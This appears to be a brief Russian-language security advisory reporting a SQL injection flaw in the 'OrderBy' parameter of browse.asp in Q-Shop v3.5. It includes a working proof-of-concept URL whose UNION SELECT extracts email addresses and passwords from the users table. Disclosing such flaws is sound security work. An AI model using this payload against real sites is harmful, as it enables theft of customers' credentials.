Программа: Q-Shop v3.5

Обнаруженная уязвимость озволяет выполнить нападение SQL инъекции. Сценарий browse.asp недостаточно санирует параметр "OrderBy" перед использованием их в SQL запросе.

Пример:

###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]

browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users



Оставить мнение